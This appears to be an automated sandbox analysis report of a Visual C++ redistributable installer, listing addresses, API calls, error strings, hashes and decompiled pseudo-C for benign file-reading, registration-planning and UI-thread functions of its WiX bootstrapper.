                                                                          0x00022ca1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ca3
                                                                          0x00022ca8
                                                                          0x00022caa
                                                                          0x00022cb2
                                                                          0x00022cb5
                                                                          0x00022cb7
                                                                          0x00022cb7
                                                                          0x00022cb7
                                                                          0x00022cb7
                                                                          0x00000000
                                                                          0x00022cb5
                                                                          0x00000000
                                                                          0x00022caa
                                                                          0x00022c82
                                                                          0x00022c85
                                                                          0x00022c88
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ab5
                                                                          0x00022ab5
                                                                          0x00022ab5
                                                                          0x00022abd
                                                                          0x00022ac0
                                                                          0x00022adc
                                                                          0x00022adc
                                                                          0x00022adc
                                                                          0x00022ae2
                                                                          0x00022aeb
                                                                          0x00022af0
                                                                          0x00022af3
                                                                          0x00022b00
                                                                          0x00022b04
                                                                          0x00022b10
                                                                          0x00022b13
                                                                          0x00022b15
                                                                          0x00022b5b
                                                                          0x00022b5b
                                                                          0x00022b5f
                                                                          0x00022dab
                                                                          0x00022daf
                                                                          0x00022db4
                                                                          0x00022db4
                                                                          0x00022dbd
                                                                          0x00022dc5
                                                                          0x00022dc5
                                                                          0x00022dd2
                                                                          0x00022dd2
                                                                          0x00022b65
                                                                          0x00022b68
                                                                          0x00022b6a
                                                                          0x00022b6c
                                                                          0x00022b8e
                                                                          0x00022b8e
                                                                          0x00022b90
                                                                          0x00022b93
                                                                          0x00022b99
                                                                          0x00022c0f
                                                                          0x00022c1b
                                                                          0x00022c1e
                                                                          0x00022c26
                                                                          0x00022c28
                                                                          0x00022c2e
                                                                          0x00022c41
                                                                          0x00022c43
                                                                          0x00022c73
                                                                          0x00022da3
                                                                          0x00022da3
                                                                          0x00022da4
                                                                          0x00000000
                                                                          0x00022daa
                                                                          0x00022c45
                                                                          0x00022c49
                                                                          0x00022c5a
                                                                          0x00022c63
                                                                          0x00022c66
                                                                          0x00022c6b
                                                                          0x00000000
                                                                          0x00022c49
                                                                          0x00022c30
                                                                          0x00000000
                                                                          0x00022c30
                                                                          0x00022b9b
                                                                          0x00022b9d
                                                                          0x00022ba0
                                                                          0x00022ba0
                                                                          0x00022ba6
                                                                          0x00022ba8
                                                                          0x00022bab
                                                                          0x00022bae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022bb0
                                                                          0x00022bb3
                                                                          0x00022bb9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022bbb
                                                                          0x00022bbd
                                                                          0x00022bc0
                                                                          0x00022bd1
                                                                          0x00022bd3
                                                                          0x00022bd5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022bda
                                                                          0x00022bdd
                                                                          0x00022be1
                                                                          0x00022be4
                                                                          0x00022be7
                                                                          0x00022bea
                                                                          0x00022bf0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022bf2
                                                                          0x00022bf5
                                                                          0x00022bf5
                                                                          0x00022bf7
                                                                          0x00000000
                                                                          0x00022bf7
                                                                          0x00022c37
                                                                          0x00000000
                                                                          0x00022bfa
                                                                          0x00022bfa
                                                                          0x00022bfb
                                                                          0x00022c01
                                                                          0x00022c04
                                                                          0x00022c07
                                                                          0x00022c07
                                                                          0x00022c07
                                                                          0x00000000
                                                                          0x00022ba0
                                                                          0x00022b6e
                                                                          0x00022b71
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022b7c
                                                                          0x00022b7e
                                                                          0x00022b80
                                                                          0x00022b8c
                                                                          0x00022b8c
                                                                          0x00000000
                                                                          0x00022b8c
                                                                          0x00022b82
                                                                          0x00000000
                                                                          0x00022b82
                                                                          0x00022b19
                                                                          0x00022b1e
                                                                          0x00022b20
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022b22
                                                                          0x00022b30
                                                                          0x00022b32
                                                                          0x00022b34
                                                                          0x00022b4b
                                                                          0x00022b4d
                                                                          0x00022b4f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022b51
                                                                          0x00000000
                                                                          0x00022b51
                                                                          0x00022b36
                                                                          0x00000000
                                                                          0x00022b36
                                                                          0x00022b06
                                                                          0x00000000
                                                                          0x00022b06
                                                                          0x00022ac7
                                                                          0x00022ad5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ad7
                                                                          0x00000000
                                                                          0x00022ad7

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00022ACD
                                                                          Strings
                                                                          • Failed to check for remaining dependents during planning., xrefs: 00022C73
                                                                          • crypt32.dll, xrefs: 00022B18, 00022C16, 00022D0B, 00022D80
                                                                          • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00022C37
                                                                          • Failed to add self-dependent to ignore dependents., xrefs: 00022B51
                                                                          • Failed to add dependents ignored from command-line., xrefs: 00022B82
                                                                          • Failed to create the string dictionary., xrefs: 00022B06
                                                                          • Failed to allocate registration action., xrefs: 00022B36
                                                                          • Failed to add registration action for self dependent., xrefs: 00022D9E
                                                                          • wininet.dll, xrefs: 00022D1E
                                                                          • Failed to add registration action for dependent related bundle., xrefs: 00022DD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                          • API String ID: 1825529933-1705955799
                                                                          • Opcode ID: 3a78601cdd021a0a3b33d08bf55f650b6d3c219bddf4e6d36203fc036b89897c
                                                                          • Instruction ID: f41e43cc29ccaf8525cb9b570823598a852427a740dd3d1ef931b027512bcdec
                                                                          • Opcode Fuzzy Hash: 3a78601cdd021a0a3b33d08bf55f650b6d3c219bddf4e6d36203fc036b89897c
                                                                          • Instruction Fuzzy Hash: DCB19D70A00626FFCB66DFA4E841BAEBBE5BF44310F108169F804AA251D770D961DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000543A6 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 247fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E000543A6(signed short _a4, signed short* _a8, long _a12, long _a16, long _a20, signed short _a24, signed short _a28) {
				void* _v8;
				signed short _v12;
				char _v16;
				WCHAR* _t36;
				signed short _t38;
				void* _t41;
				signed short _t45;
				signed short _t49;
				signed short _t50;
				long _t60;
				signed short _t61;
				signed short _t65;
				signed short _t68;
				signed short _t73;
				intOrPtr _t76;
				void* _t77;
				long _t78;
				signed short _t82;
				long _t83;
				signed short _t85;
				void* _t86;
				signed short* _t87;
				signed short _t88;
				signed short _t91;
				signed short _t96;
				signed short _t97;

				_t83 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						_t36 = _a12;
						__eflags = _t36;
						if(_t36 != 0) {
							__eflags = 0 -  *_t36;
							if(0 !=  *_t36) {
								_t86 = CreateFileW(_t36, 0x80000000, 5, 0, 3, 0x8000080, 0);
								_v8 = _t86;
								__eflags = _t86 - 0xffffffff;
								if(_t86 != 0xffffffff) {
									L14:
									_t38 =  &_v16;
									__imp__GetFileSizeEx(_t86, _t38);
									__eflags = _t38;
									if(_t38 != 0) {
										__eflags = _a16 - _t83;
										if(_a16 == _t83) {
											L25:
											__eflags = _a28;
											if(_a28 == 0) {
												_t76 = _v16;
												_t39 = _v12;
												_t73 = _t76 - _t83;
												_t77 = _t76 - _t83;
												_push(0);
												_pop(0);
												asm("sbb eax, edi");
												__eflags = 0 - _v12;
												if(__eflags > 0) {
													L27:
													_t87 = _a4;
													__eflags =  *_t87;
													if( *_t87 == 0) {
														__eflags = _t73;
														if(_t73 == 0) {
															L30:
															_t88 = 0;
															 *_a8 = 0;
															L51:
															_t41 = _v8;
															__eflags = _t41 - 0xffffffff;
															if(_t41 != 0xffffffff) {
																CloseHandle(_t41);
															}
															L53:
															goto L54;
														}
														_t85 = E000138D4(_t73, 1);
														__eflags = _t85;
														if(_t85 != 0) {
															L40:
															_t78 = 0;
															_t45 = 0;
															_a12 = 0;
															_a24 = 0;
															while(1) {
																_a16 = _t78;
																_t88 = E00053D92(_t73, _t45,  &_a16);
																__eflags = _t88;
																if(_t88 < 0) {
																	break;
																}
																_t49 = ReadFile(_v8, _a24 + _t85, _a16,  &_a12, 0);
																__eflags = _t49;
																if(_t49 == 0) {
																	_t50 = GetLastError();
																	__eflags = _t50;
																	_t91 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
																	__eflags = _t91;
																	_t88 =  >=  ? 0x80004005 : _t91;
																	E000137D3(0x80004005, "fileutil.cpp", 0x399, _t88);
																	break;
																}
																_t45 = _a24 + _a12;
																__eflags = _a12;
																_a24 = _t45;
																if(_a12 != 0) {
																	_t78 = 0;
																	__eflags = 0;
																	continue;
																}
																__eflags = _t45 - _t73;
																if(_t45 == _t73) {
																	 *_a4 = _t85;
																	_t85 = 0;
																	 *_a8 = _t73;
																} else {
																	_t88 = 0x8000ffff;
																}
																break;
															}
															__eflags = _t85;
															if(_t85 != 0) {
																E00013999(_t85);
															}
															goto L51;
														}
														_t39 = 0x8007000e;
														_push(0x8007000e);
														_t88 = 0x8007000e;
														_push(0x38c);
														L16:
														_push("fileutil.cpp");
														E000137D3(_t39);
														goto L51;
													}
													__eflags = _t73;
													if(_t73 != 0) {
														_t85 = E00013A72( *_t87, _t73, 1);
														__eflags = _t85;
														if(_t85 != 0) {
															goto L40;
														}
														_t39 = 0x8007000e;
														_push(0x8007000e);
														_t88 = 0x8007000e;
														_push(0x37f);
														goto L16;
													}
													E00013999( *_t87);
													 *_t87 = 0;
													goto L30;
												}
												if(__eflags < 0) {
													L34:
													_t88 = 0x8007007a;
													_push(0x8007007a);
													_push(0x371);
													goto L16;
												}
												__eflags = _a24 - _t77;
												if(_a24 >= _t77) {
													goto L27;
												}
												goto L34;
											}
											_t73 = _a24;
											__eflags = 0;
											goto L27;
										}
										_t83 = _a20;
										__eflags = 0 - _v12;
										if(__eflags < 0) {
											L22:
											_t60 = SetFilePointer(_t86, _t83, 0, 1);
											__eflags = _t60 - 0xffffffff;
											if(_t60 != 0xffffffff) {
												goto L25;
											}
											_t39 = GetLastError();
											__eflags = _t39;
											_t88 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
											__eflags = _t88;
											if(_t88 >= 0) {
												goto L25;
											}
											_push(_t88);
											_push(0x35f);
											goto L16;
										}
										if(__eflags > 0) {
											L21:
											_t88 = 0x80070057;
											goto L51;
										}
										__eflags = _t83 - _v16;
										if(_t83 <= _v16) {
											goto L22;
										}
										goto L21;
									}
									_t61 = GetLastError();
									__eflags = _t61;
									_t96 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
									_t39 = 0x80004005;
									__eflags = _t96;
									_t88 =  >=  ? 0x80004005 : _t96;
									_push(_t88);
									_push(0x351);
									goto L16;
								}
								_t82 = GetLastError();
								_t88 = 0x80070002;
								__eflags = _t82;
								_t65 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
								__eflags = _t65 - 0x80070002;
								if(_t65 == 0x80070002) {
									goto L53;
								}
								__eflags = _t82;
								if(_t82 == 0) {
									_t86 = _v8;
									goto L14;
								}
								_t97 = _t65;
								__eflags = _t97;
								_t88 =  >=  ? 0x80004005 : _t97;
								E000137D3(0x80004005, "fileutil.cpp", 0x34c, _t88);
								goto L53;
							}
							_t68 = 0x80070057;
							_push(0x80070057);
							_push(0x342);
							goto L2;
						}
						_t68 = 0x80070057;
						_push(0x80070057);
						_push(0x341);
					} else {
						_t68 = 0x80070057;
						_push(0x80070057);
						_push(0x340);
					}
					goto L2;
				} else {
					_t68 = 0x80070057;
					_push(0x80070057);
					_push(0x33f);
					L2:
					_push("fileutil.cpp");
					_t88 = _t68;
					E000137D3(_t68);
					L54:
					return _t88;
				}
			}





























                                                                          0x000543ae
                                                                          0x000543b0
                                                                          0x000543b3
                                                                          0x000543b9
                                                                          0x000543da
                                                                          0x000543dc
                                                                          0x000543eb
                                                                          0x000543ee
                                                                          0x000543f0
                                                                          0x00054401
                                                                          0x00054404
                                                                          0x00054431
                                                                          0x00054433
                                                                          0x00054436
                                                                          0x00054439
                                                                          0x00054481
                                                                          0x00054481
                                                                          0x00054486
                                                                          0x0005448c
                                                                          0x0005448e
                                                                          0x000544bf
                                                                          0x000544c2
                                                                          0x0005450b
                                                                          0x0005450b
                                                                          0x0005450f
                                                                          0x00054537
                                                                          0x0005453c
                                                                          0x0005453f
                                                                          0x00054541
                                                                          0x00054543
                                                                          0x00054545
                                                                          0x00054546
                                                                          0x00054548
                                                                          0x0005454a
                                                                          0x00054516
                                                                          0x00054516
                                                                          0x00054519
                                                                          0x0005451c
                                                                          0x00054585
                                                                          0x00054587
                                                                          0x0005452b
                                                                          0x0005452e
                                                                          0x00054530
                                                                          0x00054647
                                                                          0x00054647
                                                                          0x0005464a
                                                                          0x0005464d
                                                                          0x00054650
                                                                          0x00054650
                                                                          0x00054656
                                                                          0x00000000
                                                                          0x00054656
                                                                          0x00054591
                                                                          0x00054593
                                                                          0x00054595
                                                                          0x000545a9
                                                                          0x000545a9
                                                                          0x000545ab
                                                                          0x000545ad
                                                                          0x000545b0
                                                                          0x000545b7
                                                                          0x000545b7
                                                                          0x000545c5
                                                                          0x000545c7
                                                                          0x000545c9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000545dd
                                                                          0x000545e3
                                                                          0x000545e5
                                                                          0x0005460f
                                                                          0x0005461e
                                                                          0x00054620
                                                                          0x00054628
                                                                          0x0005462a
                                                                          0x00054638
                                                                          0x00000000
                                                                          0x00054638
                                                                          0x000545ea
                                                                          0x000545ed
                                                                          0x000545f1
                                                                          0x000545f4
                                                                          0x000545b5
                                                                          0x000545b5
                                                                          0x00000000
                                                                          0x000545b5
                                                                          0x000545f6
                                                                          0x000545f8
                                                                          0x00054604
                                                                          0x00054606
                                                                          0x0005460b
                                                                          0x000545fa
                                                                          0x000545fa
                                                                          0x000545fa
                                                                          0x00000000
                                                                          0x000545f8
                                                                          0x0005463d
                                                                          0x0005463f
                                                                          0x00054642
                                                                          0x00054642
                                                                          0x00000000
                                                                          0x0005463f
                                                                          0x00054597
                                                                          0x0005459c
                                                                          0x0005459d
                                                                          0x0005459f
                                                                          0x000544b0
                                                                          0x000544b0
                                                                          0x000544b5
                                                                          0x00000000
                                                                          0x000544b5
                                                                          0x0005451e
                                                                          0x00054520
                                                                          0x0005456d
                                                                          0x0005456f
                                                                          0x00054571
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054573
                                                                          0x00054578
                                                                          0x00054579
                                                                          0x0005457b
                                                                          0x00000000
                                                                          0x0005457b
                                                                          0x00054524
                                                                          0x00054529
                                                                          0x00000000
                                                                          0x00054529
                                                                          0x0005454c
                                                                          0x00054553
                                                                          0x00054553
                                                                          0x00054558
                                                                          0x00054559
                                                                          0x00000000
                                                                          0x00054559
                                                                          0x0005454e
                                                                          0x00054551
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054551
                                                                          0x00054511
                                                                          0x00054514
                                                                          0x00000000
                                                                          0x00054514
                                                                          0x000544c4
                                                                          0x000544c9
                                                                          0x000544cc
                                                                          0x000544df
                                                                          0x000544e4
                                                                          0x000544ea
                                                                          0x000544ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000544ef
                                                                          0x000544fa
                                                                          0x000544fc
                                                                          0x000544ff
                                                                          0x00054501
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054503
                                                                          0x00054504
                                                                          0x00000000
                                                                          0x00054504
                                                                          0x000544ce
                                                                          0x000544d5
                                                                          0x000544d5
                                                                          0x00000000
                                                                          0x000544d5
                                                                          0x000544d0
                                                                          0x000544d3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000544d3
                                                                          0x00054490
                                                                          0x0005449b
                                                                          0x0005449d
                                                                          0x000544a0
                                                                          0x000544a5
                                                                          0x000544a7
                                                                          0x000544aa
                                                                          0x000544ab
                                                                          0x00000000
                                                                          0x000544ab
                                                                          0x0005443d
                                                                          0x0005443f
                                                                          0x0005444c
                                                                          0x0005444e
                                                                          0x00054451
                                                                          0x00054453
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054459
                                                                          0x0005445b
                                                                          0x0005447e
                                                                          0x00000000
                                                                          0x0005447e
                                                                          0x0005445d
                                                                          0x00054464
                                                                          0x00054466
                                                                          0x00054474
                                                                          0x00000000
                                                                          0x00054474
                                                                          0x00054406
                                                                          0x0005440b
                                                                          0x0005440c
                                                                          0x00000000
                                                                          0x0005440c
                                                                          0x000543f2
                                                                          0x000543f7
                                                                          0x000543f8
                                                                          0x000543de
                                                                          0x000543de
                                                                          0x000543e3
                                                                          0x000543e4
                                                                          0x000543e4
                                                                          0x00000000
                                                                          0x000543bb
                                                                          0x000543bb
                                                                          0x000543c0
                                                                          0x000543c1
                                                                          0x000543c6
                                                                          0x000543c6
                                                                          0x000543cb
                                                                          0x000543cd
                                                                          0x00054658
                                                                          0x0005465e
                                                                          0x0005465e

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00054425
                                                                          • GetLastError.KERNEL32 ref: 0005443B
                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00054486
                                                                          • GetLastError.KERNEL32 ref: 00054490
                                                                          • CloseHandle.KERNEL32(?), ref: 00054650
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 3555958901-2299628883
                                                                          • Opcode ID: aa1e3e57d93cb3bee61ed41ec7cfde85cd44955584eeba3a0138b210fa043ec5
                                                                          • Instruction ID: 586ed2d914f79ed0645a203cde26635d50f67504e3ae6b28811858b8a80da678
                                                                          • Opcode Fuzzy Hash: aa1e3e57d93cb3bee61ed41ec7cfde85cd44955584eeba3a0138b210fa043ec5
                                                                          • Instruction Fuzzy Hash: B9713771A40615ABEF318E698C44BFF76D8EF0035AF114129FD19EB290E774CE848B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000149DF Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E000149DF(void* __ecx, void* __edx, char _a4, intOrPtr _a8) {
				void* _v8;
				void* __edi;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t37;
				intOrPtr* _t40;
				char _t60;
				void* _t62;
				intOrPtr _t64;
				intOrPtr* _t72;

				_t62 = __edx;
				_t59 = __ecx;
				_push(__ecx);
				_t64 = _a8;
				_v8 = 1;
				_t56 = _t64 + 0x88;
				if(E00023E47(__ecx, _t64 + 0x3f4, _t64 + 0x88,  *((intOrPtr*)(_t64 + 0x20)),  *((intOrPtr*)(_t64 + 0x160))) >= 0) {
					_t34 = E00019870(_t59, _t62, __eflags, _t56, _t64 + 0xac,  *((intOrPtr*)(_t64 + 0x20)),  *((intOrPtr*)(_t64 + 0x160)), _t64 + 0xf8,  &_v8);
					__eflags = _t34;
					if(_t34 >= 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags =  *((intOrPtr*)(_t64 + 0xb8));
							if( *((intOrPtr*)(_t64 + 0xb8)) != 0) {
								__eflags =  *((intOrPtr*)(_t64 + 0x20)) - 2;
								if( *((intOrPtr*)(_t64 + 0x20)) > 2) {
									E0002E3F4(_a4, 0, _t64 + 0x34);
								}
							}
							_t35 = E0002E82A(_a4, _t64);
							__eflags = _t35;
							if(_t35 >= 0) {
								__eflags = E00027B23(_t59, _t64);
								if(__eflags >= 0) {
									_t37 = E000237BC(_t59, _t62, __eflags,  *((intOrPtr*)(_t64 + 0x1c)), _t56);
									__eflags = _t37;
									if(_t37 >= 0) {
										_t72 = E000205FF(_t59, _t64 + 0x100, _t56);
										__eflags = _t72;
										if(_t72 >= 0) {
											_t40 =  *((intOrPtr*)(_t64 + 0x40));
											_t60 = 0;
											__eflags = _t40;
											if(__eflags == 0) {
												L22:
												_a4 = _t60;
												_t72 = E00014690(_t62, __eflags, _t64,  &_a4);
												__eflags = _t72;
												if(_t72 < 0) {
													_push("Failed while running ");
													goto L26;
												}
												__eflags = _a4;
												if(_a4 == 0) {
													goto L28;
												}
												L21:
												_t60 = 0;
												__eflags = 0;
												goto L22;
											}
											__eflags =  *_t40;
											if(__eflags == 0) {
												goto L22;
											}
											_t72 = E00018197(_t56, L"WixBundleLayoutDirectory", _t40, 0);
											__eflags = _t72;
											if(_t72 >= 0) {
												goto L21;
											}
											_push("Failed to set layout directory variable to value provided from command-line.");
											goto L26;
										}
										_push("Failed to set registration variables.");
										goto L26;
									}
									_push("Failed to set action variables.");
									goto L26;
								}
								_push("Failed to query registration.");
								goto L26;
							} else {
								_push("Failed to create the message window.");
								L26:
								_push(_t72);
								E0005012F();
								L27:
								_pop(_t60);
								L28:
								E0002E7EB(_t64);
								E000182A3(_t60, _t64, _t56);
								_t75 =  *((intOrPtr*)(_t64 + 0x4b0)) - 0xffffffff;
								if( *((intOrPtr*)(_t64 + 0x4b0)) != 0xffffffff) {
									E000251E9(_t60, _t75, _t64 + 0x4a0,  *((intOrPtr*)(_t64 + 0xf8)), 0);
								}
								if(IsWindow( *(_t64 + 0x34)) != 0) {
									PostMessageW( *(_t64 + 0x34), 0x10, 0, 0);
								}
								return _t72;
							}
						}
						_push(0xe0000035);
						_push(2);
						E0001550F();
						_t72 = 0;
						goto L27;
					}
					_push("Failed to check global conditions");
					goto L26;
				}
				_push("Failed to open log.");
				goto L26;
			}













                                                                          0x000149df
                                                                          0x000149df
                                                                          0x000149e2
                                                                          0x000149e6
                                                                          0x000149e9
                                                                          0x000149f6
                                                                          0x00014a10
                                                                          0x00014a38
                                                                          0x00014a3f
                                                                          0x00014a41
                                                                          0x00014a4d
                                                                          0x00014a51
                                                                          0x00014a66
                                                                          0x00014a6d
                                                                          0x00014a6f
                                                                          0x00014a73
                                                                          0x00014a7e
                                                                          0x00014a7e
                                                                          0x00014a73
                                                                          0x00014a87
                                                                          0x00014a8e
                                                                          0x00014a90
                                                                          0x00014aa4
                                                                          0x00014aa6
                                                                          0x00014ab3
                                                                          0x00014aba
                                                                          0x00014abc
                                                                          0x00014ad2
                                                                          0x00014ad4
                                                                          0x00014ad6
                                                                          0x00014adf
                                                                          0x00014ae2
                                                                          0x00014ae4
                                                                          0x00014ae6
                                                                          0x00014b09
                                                                          0x00014b0c
                                                                          0x00014b16
                                                                          0x00014b18
                                                                          0x00014b1a
                                                                          0x00014b24
                                                                          0x00000000
                                                                          0x00014b24
                                                                          0x00014b1c
                                                                          0x00014b20
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00014b07
                                                                          0x00014b07
                                                                          0x00014b07
                                                                          0x00000000
                                                                          0x00014b07
                                                                          0x00014ae8
                                                                          0x00014aeb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00014afa
                                                                          0x00014afc
                                                                          0x00014afe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00014b00
                                                                          0x00000000
                                                                          0x00014b00
                                                                          0x00014ad8
                                                                          0x00000000
                                                                          0x00014ad8
                                                                          0x00014abe
                                                                          0x00000000
                                                                          0x00014abe
                                                                          0x00014aa8
                                                                          0x00000000
                                                                          0x00014a92
                                                                          0x00014a92
                                                                          0x00014b29
                                                                          0x00014b29
                                                                          0x00014b2a
                                                                          0x00014b2f
                                                                          0x00014b30
                                                                          0x00014b31
                                                                          0x00014b32
                                                                          0x00014b38
                                                                          0x00014b3f
                                                                          0x00014b46
                                                                          0x00014b56
                                                                          0x00014b56
                                                                          0x00014b66
                                                                          0x00014b6f
                                                                          0x00014b6f
                                                                          0x00014b7d
                                                                          0x00014b7d
                                                                          0x00014a90
                                                                          0x00014a53
                                                                          0x00014a58
                                                                          0x00014a5a
                                                                          0x00014a5f
                                                                          0x00000000
                                                                          0x00014a5f
                                                                          0x00014a43
                                                                          0x00000000
                                                                          0x00014a43
                                                                          0x00014a12
                                                                          0x00000000

                                                                          APIs
                                                                          • IsWindow.USER32(?), ref: 00014B5E
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00014B6F
                                                                          Strings
                                                                          • Failed to create the message window., xrefs: 00014A92
                                                                          • WixBundleLayoutDirectory, xrefs: 00014AEF
                                                                          • Failed to open log., xrefs: 00014A12
                                                                          • Failed to check global conditions, xrefs: 00014A43
                                                                          • Failed to set registration variables., xrefs: 00014AD8
                                                                          • Failed while running , xrefs: 00014B24
                                                                          • Failed to query registration., xrefs: 00014AA8
                                                                          • Failed to set layout directory variable to value provided from command-line., xrefs: 00014B00
                                                                          • Failed to set action variables., xrefs: 00014ABE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostWindow
                                                                          • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                          • API String ID: 3618638489-3051724725
                                                                          • Opcode ID: 206bf13938e865ee60d317abebe87ff5f97dbcbf347f9807f4cb6724ba3ed5a1
                                                                          • Instruction ID: ce8a3bdd8d953a8afd7980f7f5fe46d92bfe0d0d3d5463c3ed2e1ae4dfb7dc89
                                                                          • Opcode Fuzzy Hash: 206bf13938e865ee60d317abebe87ff5f97dbcbf347f9807f4cb6724ba3ed5a1
                                                                          • Instruction Fuzzy Hash: 70410631A44A2ABBDB269A60CC85FFBBAACFF00751F010215F904A7561EB71FD9487D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E82A Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 99threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E0002E82A(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void _v24;
				void* _t21;
				void* _t24;
				void* _t28;
				intOrPtr _t43;
				int _t45;

				_v12 = 0;
				asm("stosd");
				_t45 = 0;
				asm("stosd");
				_v8 = 0;
				asm("stosd");
				_t21 = CreateEventW(0, 1, 0, 0);
				_v12 = _t21;
				if(_t21 != 0) {
					_t43 = _a8;
					_v24 = _t21;
					_v20 = _a4;
					_v16 = _t43;
					_t24 = CreateThread(0, 0, E0002E563,  &_v24, 0, 0);
					_v8 = _t24;
					if(_t24 != 0) {
						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
						 *((intOrPtr*)(_t43 + 0x3e4)) = _v8;
						_t28 = 0;
						_v8 = 0;
					} else {
						_t48 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "uithread.cpp", 0x3c, _t45);
						_push("Failed to create the UI thread.");
						goto L2;
					}
				} else {
					_t51 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
